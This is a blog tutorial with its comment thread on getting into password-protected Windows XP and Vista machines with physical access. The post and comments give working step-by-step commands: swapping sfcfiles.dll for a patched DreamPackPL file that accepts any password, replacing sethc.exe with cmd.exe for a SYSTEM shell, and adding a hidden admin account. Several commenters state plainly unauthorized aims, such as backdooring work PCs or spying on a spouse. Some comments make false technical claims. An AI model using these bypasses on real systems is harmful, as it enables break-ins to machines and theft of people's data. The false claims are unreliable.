How to Hack Into a Windows XP Computer Without Changing Password

Yesterday I talked about how to “Recover Windows Login password within minutes“. Another method to login to a password protected Windows even if you do not have the password is by making Windows accepting any passwords.
There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone elses computer without proper authorisation.
Steps to Hack into a Windows XP Computer without changing password:
1. Get physical access to the machine. Remember that it must have a CD or DVD drive.
2. Download DreamPackPL HERE.
3. Unzip the downloaded dpl.zip and you’ll get dpl.ISO.
4. Use any burning program that can burn ISO images.
5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
6. Press “R” to install DreamPackPL.
7. Press “C” to install DreamPackPL by using the recovery console.
8. Select the Windows installation that is currently on the computer (Normally is “1″ if you only have one Windows installed)
9. Backup your original sfcfiles.dll by typing:
“ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)
10. Copy the hacked file from CD to system32 folder. Type:
“copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)
11. Type “exit”, take out disk and reboot.
12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.
13. Click the top graphic on the DreamPack menu and you will get a menu popup.
14. Go to commands and enable the options and enable the god command.
15. Type “god” in the password field to get in Windows.
You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.
Note: I was unable to bring up the DreamPackPL for the first time because I have Kaspersky Anti-Virus already running in background. I believe most antivirus already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. DreamPackPL helps you bypass the Windows Login screen and it is not destructive.

Nice info Raymond. Anyway, there are many ways to bypass Windows Logon Screen if you have physical access to machine. I prefer the the infamous sethc.exe trick
All you need is Live CD that supports Captive NTFS i.e. Backtrack. Here we go:
captive-install-acquire
mkdir /mnt/ntfs
mount -t captive-ntfs /dev/hda1 /mnt/ntfs
cd /mnt/ntfs/windows/system32
mv sethc.exe sethc.old; cp cmd.exe sethc.exe
sync
cd ~
umount /mnt/ntfs
shutdown –r now
Boot into Windows and press SHIFT five (5) times. Command Prompt with SYSTEM privileges will pop-up. Game over

you need to make sure that your CD-ROM drive is D:\
If you get the error saying that command is not valid, make sure you do not use the quotation marks “

Use any linux live boot CD/DVD…ie Knoppix/Ubuntu ect…and you can read the data from the NTFS partition without writing anything to the hard drive.

I just start windows in safe-mode, it bypasses the password. My mother forgot her password and used the safe-mode to change the password. Easy !

i’m having trouble getting this to work. i’ve followed the instructions to the letter, but when i type “dreamon” in the normal login form, nothing happens (other than the computer telling me that’s not a valid password). a couple things that could be causing problems –
1) this computer is on a network, and the login prompt is a novell network prompt – however, i’ve tried checking the “workstation only ” checkbox, but it still doesn’t work
2) this computer is running symantec av corp which keeps finding and deleting the program, i think it does so even before the login prompt appears – however, i’ve tried booting into safe mode (shouldn’t that prevent the av from running?), but it still doesn’t work

I tried to follow the instructions but when I get to the site where I am supposed to download the ISO file there were no working links that allowed me to download the image. Additionally, the site was entirely in a language I do not understand. I would like to know if there is an alternate site where I can download the image or if someone on this blog can send the image to me. I appreciate all assistance.
I believe that the website must have over the bandwidth limit. Might have to wait till the bandwidth is being reset to get back the website.

Thanks for the update but there are new problems. I tried installing Dreampack pl onto my laptop which runs XP Pro and the command ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld would not work. Similarly, I tried to install it on my Media Center PC and it wont even appear in the Bios! It doesnt recognize the cd at all, it is as if there is no disc in the drive. Is DreampackPL designed only for XP Pro? I appreciate all assistance.
Thanks for the upload. Now the problem is once it gets to the Windows 2000 setup it allows me to press R to run DreampackPL but, after that it insist that I quit and press only F3. The error message is that it is not recognizing any hard drives installed on my system though I have two install perfectly. This error message only appears when I am trying to install DreampackPL. PLEASE HELP!
thepersimmon, if you’re using novell login prompt, this method won’t work because it won’t use the hacked sfcfiles.dll. If you have antivirus running, then this tool can’t work too since it will flag this tool as HackTool.
neom, I think if your network has corporate edition of antivirus, your admin might be notified because antivirus flag this tool as HackTool.
DeLano, renaming the sfcfiles.dll in recovery console should work. Did you get any error messages? Is your Windows located at your C:\ drive? Is your Windows folder “WINNT” or “Windows”?

I have followed the steps to the letter. When I reboot my XP computer, It starts with the windows login. When I enter dreamon as password, I just get a reminder that I have entered the wrong password. Why is this not working?

Iboot up with the cd and go through all of the processes up to typing exit and rebooting after copying over the sfcfiles.dll file. When the computer reboots it keeps rebooting continuously. It gets to the starting up windows screen and then re-boots. Any help would be greatly apprecited. Thanks!

Da King, you type “dreamon” when you’re at the XP Login screen.
Then it will prompt you that you’ve entered a wrong password but then the DreamPack PL screen will come out straight away.

hey guys, i recently just got back from a weekend outing and found out that someone had tried logging in on my computer and changed the default username that is used to login.. now i still remember my password but i completely forgot my username since i never really needed to look at it.. is there another proces and maybe even an easier one in recovering usernames? .. thanks in advance.. p.s. i tried burning the the dreampack.iso file and stuck it in the cd drive and when i turned on the computer, it went straight to the login screen, it did not recognize the cd.

In the server 2003 i can get to the dream pop-up and it lists all of the logins, but i have no menu bar that comes down and if I highlite on and hit enter the dream pop-up goes away and i am back to the drawing board (Bored) lol

Thanks so much for the help, I managed to retreive my password on one of my computers successfully. I love you.
However, I have a problem on my second computer. I can not boot from the cd (It just starts Windows Xp all the time). So I did a google search, and I found that it is probably the CMOS (whatever that is) settings. So I followed the instructions to start my pc in setup and there’s a password on that too, and I’m locked out there too
. Am I out of luck? Is there another way that I can boot from the CD? Can I retreive my admin password another way? Can I even reinstall XP like this?

Can we modify windows xp pro and add this HACK ,so that when installing a clean windows this hack install its self when installing windows .
so lets said i wanted to install windows on a pc at work ,but didnt want them to see me add this hack,so all i had to do was to bring my edit version of windows with this hack added ,install it on a new pc with one disc ,let them change there password,then in few days come back to the pc ,type dreamon and log my self on to this pc without them knowing.

If you have another way, or can get this one working, i would be really greatfull. plz reply via email. (To find info on the cmmand i was talking about, go to ‘windows help and support centre’ type ”command-line reference’ in search. Look at the things on the left then click on the hyperlink ‘Command-line reference A-Z’. Scroll down to ‘S’ and click on ‘Shutdown’)
ANNA! the only way you are going to be able to do that is by resetting your bios manually, that is done by eiher a jumper or taking out the batery and doing a few other things ater that….. phone a computer shop and ask the to guide you through the process. after you have done that the password will be removed. and then you just have to change you boot sequence.

I’ve done a wide search and read this page extensively and noone yet has seemed to have my problem. I have burned the iso and booted the system using the CD, and am currently at the DOS-type screen. After I choose the system, it asks for an administrator’s password, and I type anything, as per instructions, but it keeps telling me that the administrator’s password is wrong, and forces me to restart after 3 attempts. What am I doing wrong? Any help would be greatly appreciated.

this looks great but… I use computers that have 2 accounts one for admin and one for the basic user. when the computer starts the basic user auto logins. As the basic user i cannot add or remove programs or stop them from running . they have symantec antivirus and i dont have the rights to stop it. how can i install this if i do not have access?? is there anyway i can just view the admin password?? i cannot touch windows folders or program folders.

I tried burning the ISO using the program, but the resulting disc acts like a WinXP installation disc. I tried entering various admin passwords in the console, but no go.
I went to Damian’s site to download the ready-made ISO, but it was unavailable. Is there any place I can find it? I’ve looked all over the web. I’d really like to have this tool for clients who have forgotten their passwords.

hey why the fuk don’t u guys create a bypass thing with out needing to install basically for windows
there are ways around the antivirus/spyware issues, but they are inconsistent and unpredictable. One option is to (luckily) have a guest account with no password already in place. Then, log into that account. Next, use the “switch user” (instead of logout) functionality. This repeated brought me back out the the main login screen and seemed to bypass mcafee’s locking up the sfcfiles.dll.
I can’t say whether it would work for you. It worked for me, however.

Don’t be tricked by the 5Mb you might find. And if you find it and various formats get the .ISO one and burn it on a CD as it is.
If you open it you might find it difficult to make it work.

Regarding Vista, this works with the following procedure (with the sethc hack). I’ve tried it on Vista Basic and I think it should work on any other Vista distribution.
CAVEAT: the sethc.exe exploit is already known to many antivirus/security applications, so having one installed may prevent this method from working.
1. Boot with the DreamPackPL CD
2. Enter the recovery console by pressing ‘R’ for repair first, then ‘C’ for console-based recovery
3. Select the Windows installation, usually this is just ‘1′ if you have only one version
4. Change directory to ’system32′
– cd system32
5. Backup the existing sethc.exe file
– copy sethc.exe sethc.old
6. Copy cmd.exe over as sethc.exe instead
– copy cmd.exe sethc.exe
7. Exit the prompt, remove the CD
8. Reboot
After the rebooted system comes up, press the “Shift” key 5 (five) times.
You’ll get a command prompt with system privileges. Now, you can create a Administrator user as follows:
1. Create a hack user first using ‘net user’
– net user hackuser * /add
– You will be prompted for a password, enter it twice as asked
2. Then give the user administrative privileges
– net localgroup Administrator hackuser /add
3. Exit the command shell by typing ‘exit’
4. Reboot/restart the PC
When the system comes up again, this time you’ll see a user named ‘hackuser’ listed. You can login with it, with the password you created.
VOILA!! Now you are into the system!!

TO RESTORE:
1. As the ‘hackuser’, delete your own account from ‘Users and Groups’

4. Obviously you’d only do this to find out if you’re wife was cheating, as I was
i have a way easier way…once u download the dreamondl and burn as an .iso image…start the computer u plan on using this on and hurry and put the cd in and close it…it should pop up and say windows had trouble installing your devices or some shit…anyways there is somewhere on there where u can click safe mode with command prompt, click that and it will go to the user screen u can just click the account that has the user name administrator without puttin in a password and then it will bring u to the command prompt and from there u can do all sorts of stuff…but what i did is typed the following ” net user john * ” in my case i put john but in yours it would be the passworded account u want to change, it will ask u to type the new password and then hit enter then ask u again…then it will say done succefully…after that u changed it…good luck…and questions email me

Here’s my problem… at the login screen, i type in my user and password.
It says “loading settings. Then it says “saving settings” and “shutting down”.
Then my login screen pops up again. Think that this will help me?
I can’t get the dream on console to pop up either.
My computer has Symantec Antivirus running on it. I am assuming this is why the CD never starts running the Dreampack software. Is there a way to shut the antivirus off? I have IBM recovery on the computer so I can access some file just cannot log-on to windows.

Found a FIX that was way too easy. Pressed Control Alt Delete Twice, blank log on screen comes up. User name Administrator, password blank. And wow I’m in.
Oldman, that is not even a hack. You’re just lucky that the computer default Administrator username wasn’t changed AND no password was configured to it.
Raymond, ive got a problem and was hoping you could help. I downloaded the DreamPack thing and used it for a while and nothing went wrong. Then today i decided to try and play around with different settings and such. I turned on the accountlogger and the continued to use my computer. Eventually, I restarted it and a message came up saying that i had been hacked and listed a phone number to call (suicide hotline- i thought it was pretty funny) I was wondering if this had anything to do with Dreampack logging my password, or if it is something more sinister that I should be worried about.

Changing password of administrator without knowing the previous one. Just go to run command and type cmd and press enter. as soon as command windows displays type “net user” without commas and press enter. you will see the user accounts.
Type ” net user administrator* ” press enter
enter new password and press enter. Enjoy with you new password now. Iam sure it works only when you log on with administrator, but it does not works with guest account or any limited account

HELP! I downloaded the iso and made my Dreampack CD. It all goes like clockwork until I get to the recovery console, but then it asks me for an admin password, and says (DreamPack users type anything:) ). Whatever I type in, it tells me the password is wrong, and after 3 attempts the machine reboots…

In step 14, enable “god” option by checking the check box that says God-Password.
If you didn’t enable the God-Password option, typing “god” won’t work.

If you want to see the content of Windows hard drive, why don’t you guys use LiveCD Linux eg: Ubuntu,etc. You dont have to download anything.just boot up and open using Konqueror or Nautilus.

We had enabled the option, type ‘god’ in upper and lower case and could not get to work, that is why I asked the question of enabling the option, thought I was doing something wrong.
I have tried it many times, it copies all the files etc, and have even tried the passwords option as written under instruction 15. However, it still doesn’t work.
Any further ideas please?

hello. this is all pretty complicated for me. i have windows xp but i can’t get passed the LOG ON TO WINDOWS screen. I got the laptop from my neighbor so there is a username there but they can’t figure out the password ?????????? anyway i can just “skip” this screen. This all seems great.. I really don’t know what i am suppose to do from 8 and on.. there is no selection option.. it just gives me a list of the installation process:
1> Change current directory to system directory
> cd system32

ok heres my problem… cmd is disabled… cant get the disc to boot.(changing the bios setup did not help this.)lstarting up in safe mode doesn’t help because there are no user names visible. no floppy drive so i cant use that to try to boot. anyone know of any other way to bypass windows login? i heard about “jumping” the hard drive but i have no idea how to do that

I tired the hack and it works great! I have only one problem, i got the thing downloaded and used it for about a month! After that there is a feature with the drop menu that says passoff i clicked this thinking that it would only turn off the password for the one account, but it turned the passwords off for all the accounts! So i dont know how to change it back because it took off all the passwords and i cant type in “dreamon” any were so that i can change it! Is there anyway to fix this!

I tryed to install this program but when I inserted the CD nothing poped up allowing me to install the program. I rebooted and took out the CD and tryed again, but nothing is working. Is there a program on my computer i can use to install DreampackPL?
Also, I have used the Window’s default installer from the system tasks, but when i choose to install a program it finds nothing. Any advice?

recently my buddy gave me a dell precision 390 desktop…I turn it on , the dell logo appears then disappears, the screen turns black and then asks to “type the system password and press (enter)”…what should I do to gain access? I tried pressing f2 for set up but it says to change passwords you must first enter old password…The computer looks fairly new, it has Windows XP as the operating system and a Pentium core duo processor…Is there any remedy for this or am I beat???

I am using DreampackPL, but when I get to the point where it asks me for the administrators password, following the dreampack instructions just leads to a failure of 3 times. This in turn leads to a restart taking me no where. How do i solve this?

I just tried downloading that dreampack software and it has a trojan in it. Please provide a viable source for this file that doesn’t have a trojan in it. BTW, I have an old Compaq Armada M700 that has an HP installation of Windows XP Pro. It was given to me by my boss because it was so old & not being used. But I want to use it, and I can’t log in to re-install my own copy of XP.

ok i will teach u how to hack into adm passwrd 1st start ur comp and when it displays ur pc compny name press F8 it will display some modes to start but u slect safe mode chose admi accont it will not ask 4 psswrd then go to controll pannel and slect the account u want to remove passward it will not ask 4 passwrd to remove itr just click remove pswrd and restart u r pc normally cong u hacked into xp admanisteratr pswrd any problem in this artical e mail me

I wasn\\\\\\\’t able to get anywhere initially with DreamPack using command/God because all the accounts were set to \\\\\\\”Limited\\\\\\\”. But then I noticed the \\\\\\\”Windows Accounts Panel\\\\\\\” option… and voila! Problem solved! Thank you!

I find your procedure quite frustrating. I prefare the method below only if it will work and how do you get the information on the live CD.
\\\’\\\’All you need is Live CD that supports Captive NTFS i.e. Backtrack. Here we go:
captive-install-acquire
mkdir /mnt/ntfs
mount -t captive-ntfs /dev/hda1 /mnt/ntfs
cd /mnt/ntfs/windows/system32
mv sethc.exe sethc.old; cp cmd.exe sethc.exe
sync
cd ~
umount /mnt/ntfs
shutdown –r now
Boot into Windows and press SHIFT five (5) times. Command Prompt with SYSTEM privileges will pop-up. Game over

hey i just read the interesting post but i have to say that if you forget the password on xp it would be easier if you went in to safe mode and found the password it bypasses the whole login screen you can change it or just plain remove it

i did all the steps and it worked, i typed in dreamon in where i normally type my password, and i chose the option;

it all worked and got into my own computer, but when i rebooted my computer i dont have to type in a password, when i click my account i immediately log in. i cant set a new password, cause then it says \\\”cant set password\\\” (or something like that). so anyone can get into my computer now, and i cant find a way to set a password. Or you could just use the system account, by doing Run (or if they have run disabled open a text document if they have that disabled right click in Internet explorer, and click \”View source\” and that will open a text doc, Use that, erase every thing and put in command.com and save it as cmd.bat to the desktop it will work the same as command prompt but it will be slower, and when you exit you will have to end the task by the popup) but any ways, type (with out \”) \”At (Current Military time +1 Minute) /interactive cmd.exe\” it will save it, then do taskkill /f explorer and it should work or do tasklist and find the task id for the task explorer.exe and do taskkill /f /pid (Task I.D.) and it will kill it your screen will go blank, Close out the command prompt and wait for the window to pop up, when the new window pops up i should say at the top C:\\WINDOWS\\System32\\svchost.exe (This is for windows XP, Not 2000 or mel.) then type into the Svchost.exe window explorer.exe and it will bring back up the background after it applies your settings, and congradulations, you now have 100% access to the computer on a account thats 100% hidden, Take care of this information.
I wrote the ISO image to the cd as a bootable disc, but when i try to boot from the cd it takes me to Caldera DR_DOS 7.03 and i can\’t do anything.. what am i doing wrong???

Ok I have followed the instructions to the t I have downloaded and burned with a software capable of burning an ISO image.
It goes through setup then I press r I then press c for the recovery console.
I choose the op system which in my case is 1(not sure but my volume label isn\’t listed as c in properties when I am logged on to windowns it has a differnt name)
My cd/dvd drive is d
but when I type the backup command it says that it can\’t find the file
does the same when I use the copy command and that is as far as I get

As I follow the steps I got stuck on step 6, I get the message windows can not find any harddisk. I know the is a hardisk because i can turn on the computer and it will load up to the login screen which I want to bypass.

Ok, for all of you who have the problem when typing dreamon into the password and an error appears saying access denied, try restarting the computer WITH the DreamPackPL disk in it, leave the disk in it and type dreamon into password slot!

try re-copying the files again, and leave the disk in and reboot, then try.
It was successful only to the point of getting the popup menu. The \’god\’ password did nothing and sent it off into the weeds. Is it waiting for a network connection?
Having booted again and clicked on \”uninstall\”, it failed citing it cannot find the LLD file. I looked for that file and couldn\’t find it.
I saw no advice about virus scanners. Did McAfee remove it without notice?

Sorry about the lengthy posting here but I feel as if I have a different situation from the rest of the people here and a different location to where my computer boots to. my computer will only start from the administrative User name and Password page (It looks exactly like the picture posted above in the directions with the \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\”X\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\” marked through it). There is only one user account and this page is it. I\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\’ve reset the password but forgot it, the user name I chose is still there. When I try to bypass this in safe mode it will only bring me right back to this page but just in the safe mode design with Vy user name still there. No other options there at all. I have burned the CD but can I run it without starting it from its CD drive? Do I have any other options? Its simply doing what its supposed to do and not letting idiots (since i forgot the password) into it. and the page cannot be bypassed from anything I\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\’ve read or have tried. Greetings all and pardon the post from a computer illiterate such as myself. I believe that someone has been trying to hack into my computer via my zyxel router and possibly by having access to my computer too while I have worked away. How can I possibly check that my computer has been breached. I am assuming all the log files are lies anyway and they show nothing.

I have no problem navigating through a computer and doing various things, but all of this computer talk is confusing and im worndering if it will work for my situation. Ok, so my dad (who is a computer programmer and can hack into an account easily) won’t let me have an administrator account on my home windows xp computer. My dad thinks that i will abuse the power and he won’t teach me. So im wondering if this is the way to get around his password not altering it so he know i did something, but just jumping over it. Also does this way leave any kind of trace that he would be able to find. Well, would you be able to find out this happened if someone did this to you?

Microsoft must have introduced a patch to prevent DreamPack from working. When you go into the recovery console, if you hit “R,” it takes you to a DOS prompt.

I have spent the last couple of hours trying to unzip this dreampackpl and see dreampackpl as an ISO file but its not happenening. I even opened Ashampoo assuming it would detect any image files to burn but none came up. Is it possible there is a file missing?
Would you happen to know where I can just download dreampackpl.ISO directly instead of having to unzip?

you could hack a computer by simply typing random passwords at excelent speed, you don’t any program to hack into a password protected computer(any windows). Trust me, this really works, but you have to be fast. By doing this the computer will lose the ability to cancel the password and will lose the original password crashing its database allowing you to hack in without any trouble, this the easiest into hacking any computer. It works, i dont think anybody tried this, when u hack into someone’s computer with another computer, crash the database and boom, u got a zombie, if u know what that means, keep doing this and u will soon have enough zombies on ur side to crash the whole internet!!! This is how the internet almost died in year 2000.

Gee Carol, I’m sorry to hear about your loss! I’d try to get an “administrator password changer” which are mostly online and free and they reset the password to log on. Those are copied by a floppy and or burned like this above one. Although the above one seems much more through, so I would give Raymonds a try first. there is an easy way of doing it
start windows xp in safe mode with command prompt open the task manager run a new prosess explor.exe from the windows folder the go on control panel and make a new user or just delete the old 1
I tried this and got an error about Access Denied scfiles.dll. I couldn’t figure out the problem.
I used this method instead, it worked exactly as shown in the youtube video. Just follow it exactly step by step and should work as well.

Note: The EBCD site has changed and only offers the demo version of the program that will not change the password without the license. Google “EBCD pro” and download the previous version. This worked for me on XP pro.

Not sure if you’re still following these but I’m having a bit of trouble.
Trying to crack my brother’s XP computer, and it works fine up until the backup/copy stage.
My brother’s computer has an issue when logged in that prevents the user from directly accessing the C:\ drive. When logged in, this can be easily worked around via the ‘explore’ function and also by using the address bar, however I think that it is preventing the backup/copy stage of the installation, for upon entering command:
‘ren C:\windows\system32\sfcfiles.dll sfcfiles.lld’
I am given:
‘Access is denied’
If there is any way to bypass this, and either Raymond or anybody else can help out, it would be much appreciated.

Please help, as I’ve followed your instructions to the point of burning the ISO image to CD, but you said it would run some files and summit about Windows 2000 setup but all i get is a folder full of useless files and there is one that says its an installer… well SMSS Windows NT Setup – Microsoft corporation… in the SYSTEM32 folder. If i press it it just says it cannot run in win32 mode, please help TY

I was given a PC w1 Windows XP Pro, w/o any prior knowledge of its users or passwords.

This is rather outdated. You could try using Kon-boot. Raymond described how to use it here http://www.raymond.cc/blog/archives/2009/04/29/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/
ALTERNATIVE: Disable McAfee Antivirus and download DreamPack, then follow the instructions described in the article.

why even do that if you could hack it a easier way.
1)turn on the computer and get to the point where you have to put in a password.
2)click ctrl alt del(delete) and then the screen will turn black with a box in the middle.
3)put in the username but leave password blank,click ok and you are in

HI,
I have Burnd the ISO to disk and when i boot from disc press “R” & “C” then number “1″.
So then i type the commands: ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld
Then what do i do after i type the command? DO i type this on the next line: copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll
Then EXIT SHould i take the CD out after i exit, then let WIndows start normally?? SHould the Dreampack start??

If you forget the administrator’s password but still can log on Windows with other user names that have administrative privileges, you may follow the instructions below:
Right click the computer icon on your desktop, select Manage, find Local Users and Groups, unfold Users folder, right click Administrator, click Set password… in the menu comes up. Click Proceed in the dialog, in the pop-up, enter a New Password and confirm it. Your administrator’s password is successfully reset.
Guest account may help to log onto Windows, but it has no privilege for you to do the above to reset the administrator’s password.
If you forgot all user passwords and failed to log onto Windows, there is no other way but to format the OS and reinstall Windows, or resort to sort of software tools to remove the password and log onto Windows. These programs cost some bucks, but are worthy and better than to reinstall the OS causing consequences. The most popular programs are Windows Password Reset 6.0 etc. Generally, these programs are easy to use though turn out to be a scary command prompt to newbie. But do relax and you can fully manipulate. Let’s take Windows Password Reset 6.0 for example. You prepare a blank CD, burn the program onto the CD, boot the locked computer from the CD, come to initiate the program, locate the user name, and proceed to remove its password – all are at ease.
